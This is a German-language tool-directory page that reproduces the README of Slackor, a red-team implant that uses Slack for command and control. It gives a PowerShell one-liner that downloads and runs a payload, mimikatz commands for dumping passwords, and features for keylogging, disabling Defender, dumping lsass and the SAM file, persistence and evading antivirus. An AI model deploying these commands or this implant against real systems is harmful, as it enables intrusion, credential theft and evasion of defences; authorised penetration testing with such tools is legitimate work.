Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Slackor — Ein Golang-Implantat, das Slack als Command-and-Control-Server verwendet. | Kitploit
Tools/GitHubGitHub/coalfire-research/slackor
Privilege EscalationPayload-GenerierungPersistenzmechanismenLaterale BewegungShellcodePost-ExploitationPenetrationstestsCommand and ControlRed Teaming
GitHubcoalfire-research/slackor

Slackor

Ein Golang-Implantat, das Slack als Command-and-Control-Server verwendet.

460108vor 6 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigenWebseite

Slackor #

Gepflegt unter https://github.com/n00py/Slackor

Ein Golang-Implant, das Slack als Command-and-Control-Kanal nutzt.

Dieses Projekt wurde inspiriert von Gcat und Twittor.

Slackor Screenshot Wireshark Screenshot Dieses Tool wird als Proof of Concept veröffentlicht. Lesen und verstehen Sie unbedingt die Slack App Developer Policy, bevor Sie Slack-Apps erstellen.

Setup

Hinweis: Der Server ist in Python 3 geschrieben

Damit dies funktioniert, benötigen Sie:

  • Einen Slack-Workspace

  • Registrieren Sie eine App mit den folgenden Berechtigungen:

    • channels:read
    • channels:history
    • channels:write
    • files:write:user
    • files:read
  • Erstellen Sie einen Bot

Dieses Repo enthält fünf Dateien:

  • install.sh Installiert Abhängigkeiten
  • setup.py Das Skript zum Erstellen der Slack-Kanäle, Datenbank und Implants
  • agent.py Skript zum Generieren neuer Implants
  • server.py Der Slackor-Server, entwickelt für den Betrieb unter Linux
  • agent.go Das Golang-Implant
  • requirements.txt Python-Abhängigkeiten (werden automatisch installiert)

Um loszulegen:

  • go get github.com/Coalfire-Research/Slackor
  • cd $GOPATH/src/github.com/Coalfire-Research/Slackor
  • Führen Sie install.sh aus
  • Führen Sie setup.py aus
    • Geben Sie den OAuth Access Token und Bot User OAuth Access Token aus Ihrer App an

Nach erfolgreichem Ausführen des Skripts werden im Verzeichnis dist/ mehrere Dateien erstellt:

  • agent.windows.exe: Windows 64-Bit-Binärdatei
  • agent.upx.exe: Windows 64-Bit-Binärdatei, UPX-gepackt
  • agent.darwin: macOS 64-Bit-Binärdatei
  • agent.32.linux: Linux 32-Bit-Binärdatei
  • agent.64.linux: Linux 64-Bit-Binärdatei

Nach dem Start von server.py auf einem Linux-Host führen Sie das für Ihren Zielhost passende Agent aus.

Führen Sie das Modul "stager" aus, um einen One-Liner und andere Dropper zu generieren.

root@kitploit:~
powershell.exe iwr [URL] -o C:\Users\Public\[NAME].exe; forfiles.exe /p c:\windows\system32 /m svchost.exe /c C:\Users\Public\[NAME]; timeout 2; del C:\Users\Public\[NAME].exe

Dies führt InvokeWebRequest (PS v.3+) aus, um die Payload herunterzuladen, sie mit einem LOLBin auszuführen und sich nach dem Beenden selbst zu löschen. Dies ist ein funktionierendes Beispiel, der Befehl kann jedoch angepasst werden, um eine andere Download- oder Ausführungsmethode zu verwenden.

Verwendung

Geben Sie "help" ein oder drücken Sie [TAB], um eine Liste der verfügbaren Befehle zu sehen. Geben Sie "help [BEFEHL]" ein, um eine Beschreibung des Befehls zu erhalten.

(Slackor)

  • help - Zeigt das Hilfemenü an
  • interact - Interagieren mit einem Agent
  • list - Alle registrierten Agents auflisten
  • remove - Einen Agent beenden und entfernen
  • revive - Sendet ein Signal an alle Agents, sich erneut beim Server zu registrieren
  • stager - Generiert einen One-Liner zum Herunterladen und Ausführen des Implants
  • quit - Programm beenden
  • wipefiles - Löscht alle hochgeladenen Dateien aus Slack

Sobald ein Agent eingecheckt hat, können Sie mit ihm interagieren. Verwenden Sie "interact [AGENT]", um in eine Agent-Eingabeaufforderung zu gelangen. Geben Sie "help" ein oder drücken Sie [TAB], um eine Liste der verfügbaren Befehle zu sehen.

(Slackor:AGENT)

  • Allgemeine Befehle
    • back - Zurück zum Hauptmenü
    • beacon - Ändert die Zeit zwischen den Check-ins eines Agents (Standard sind 5 Sekunden)
    • download - Eine Datei vom Agent auf den Slackor-Server herunterladen
    • help - Zeigt das Hilfemenü an
    • kill - Den Agent beenden
    • sleep - Den Agent einmal pausieren lassen (Zeit in Sekunden angeben)
    • sysinfo - Zeigt den aktuellen Benutzer, die Betriebssystemversion, Systemarchitektur und Anzahl der CPU-Kerne an
    • upload - Eine Datei vom Slackor-Server auf den Agent hochladen
    • wget - Beliebige Dateien über HTTP/HTTPS herunterladen
  • Windows-Befehle
    • bypassuac - Versucht, einen Agent mit hoher Integrität zu starten
    • cleanup - Entfernt Persistenz-Artefakte
    • clipboard - Ruft den Inhalt der Zwischenablage ab
    • defanger - Versucht, Windows Defender zu entschärfen
    • duplicate - Bewirkt, dass der Agent eine weitere Instanz seiner selbst startet
    • getsystem - Startet einen Agent als NTAUTHORITY\SYSTEM
    • keyscan - Startet einen Keylogger auf dem Agent
    • minidump - Erstellt einen Speicherauszug von lsass.exe und lädt ihn herunter
    • persist - Erstellt Persistenz durch Einbetten einer Binärdatei in einen ADS
    • samdump - Versucht, die SAM-Datei zur Offline-Hash-Extraktion zu dumpen
    • screenshot - Erstellt einen Screenshot des Desktops und ruft ihn ab
    • shellcode - Führt x64-rohen Shellcode aus
  • Mac-Befehle
  • Linux-Befehle
    • screenshot - Erstellt einen Screenshot des Desktops und ruft ihn ab

OPSEC-Überlegungen

Befehlsausgaben und heruntergeladene Dateien sind zusätzlich zu Slacks TLS-Transportverschlüsselung AES-verschlüsselt.

Module warnen Sie, bevor sie Aufgaben ausführen, die auf die Festplatte schreiben.
Beim Ausführen von Shell-Befehlen beachten Sie, dass cmd.exe/bash ausgeführt werden. Dies könnte auf dem Host überwacht werden. Hier sind mehrere OPSEC-sichere Befehle, die kein cmd.exe/bash ausführen:

  • cat - Dateiinhalt ausgeben
  • cd - Verzeichnis wechseln
  • find - Verzeichnisdateinamen durchsuchen
  • getip - Externe IP-Adresse abrufen (stellt eine DNS-Anfrage)
  • hostname - Hostnamen anzeigen
  • ifconfig - Schnittstelleninformationen anzeigen
  • ls - Verzeichnisinhalt auflisten
  • mkdir - Ein Verzeichnis erstellen
  • pwd - Aktuelles Arbeitsverzeichnis anzeigen
  • rm - Eine Datei löschen
  • rmdir - Ein Verzeichnis löschen
  • whoami / getuid - Aktuellen Benutzer anzeigen

Danksagungen

  • https://github.com/EgeBalci - Funktionen adaptiert von HERCULES und EGESPLOIT
  • https://github.com/SaturnsVoid - Keylogger adaptiert von GoBot2
  • https://github.com/vyrus001 - x64-Shellcode-Ausführung shellGo
  • Kryptofunktionen übernommen von https://www.golang123.com/topic/1686
  • Persistenz-Idee von Enigma0x3
  • Minidump übernommen von Merlin, Dank an C-Sto
  • Screenshot-Code von kbinani
  • Zwischenablage-Code von atotto
  • Stager-Generator von hlldz
  • UAC-Bypass von winscripting.blog
  • Lulzbin-Fund von @vector_sec
  • Unzählige Threads auf StackOverflow
  • Dank an impacket zum Dumpen von Hashes aus SAM/SYS/SECURITY-Registrierungshives.
  • LSASS-Dump-Credential-Extraktion ermöglicht durch pypykatz von skelsec
  • Bob Aman (Sporkmonger) für verschiedene Ergänzungen

Zukünftige Ziele

  • DOSfuscation
  • Reflektives Laden von DLL/PE - https://github.com/vyrus001/go-mimikatz
  • Ausführen von C#-Assemblies im Speicher - https://github.com/lesnuages/go-execute-assembly
  • Quellcode-Verschleierung https://github.com/unixpickle/gobfuscate

FAQ:

Ist dies sicher für den Einsatz in Red Teams / Penetrationstests?

Ja, unter bestimmten Bedingungen. Während die Daten während der Übertragung verschlüsselt sind, enthält der Agent den Schlüssel zur Entschlüsselung. Jeder, der eine Kopie des Agents erhält, könnte es rückentwickeln und die API-Schlüssel sowie den AES-Geheimschlüssel extrahieren. Jeder, der den Workspace kompromittiert oder anderweitig Zugriff darauf erhält, könnte alle darin enthaltenen Daten abrufen. Aus diesem Grund wird nicht empfohlen, dieselbe Infrastruktur für mehrere Organisationen wiederzuverwenden.

Was ist mit Mimikatz?

Das Implant hat keine integrierte Funktion zum Auslesen von Passwörtern im Speicher. Wenn Sie logonPasswords benötigen, können Sie Folgendes versuchen:

root@kitploit:~
(Slackor: AGENT)minidump

Dadurch werden automatisch Passwörter mit Pypykatz extrahiert. Alternativ können Sie Mimikatz unter Windows verwenden.

root@kitploit:~
>mimikatz.exe
mimikatz # sekurlsa::Minidump lsassdump.dmp
mimikatz # sekurlsa::logonPasswords

Ist es plattformübergreifend?

Es hat eingeschränkte plattformübergreifende Unterstützung. Es wurde nicht vollständig auf allen Systemen getestet, auf denen es ausgeführt werden kann. Der Server wurde für Kali Linux entwickelt. Der Agent wird für Windows, Mac und Linux kompiliert, wurde aber hauptsächlich unter Windows 10 getestet. Agents könnten Befehle falsch verarbeiten, die von der Plattform des Agents nicht unterstützt werden (versuchen Sie nicht, einen Mac zu minidumpen).

Wie gut skaliert es?

Die Skalierbarkeit ist durch die Slack-API begrenzt. Wenn Sie mehrere Agents haben, ziehen Sie in Betracht, das Beacon-Intervall von nicht verwendeten Beacons zu erhöhen.

Ist es anfällig für Standard-Beacon-Analyse?

Derzeit hat jedes Beacon einen eingebauten Jitter von 20%, und die Beacon-Zeiten können angepasst werden. Die Check-in-Anfrage- und Antwortpakete des Agents werden etwa gleich groß sein, solange keine neuen Befehle empfangen werden.

Warum haben Sie [x] gemacht, obwohl es einen besseren Weg [y] gibt?

Ich habe mein Bestes gegeben. Pull Requests sind willkommen :)

Es wird von AV erkannt!

Da dies jetzt Open Source ist, wird es zwangsläufig Probleme geben. Ich werde Module nach Möglichkeit reparieren, aber es gibt keine Garantie, dass dies jederzeit alle AV umgeht.

Tool herunterladen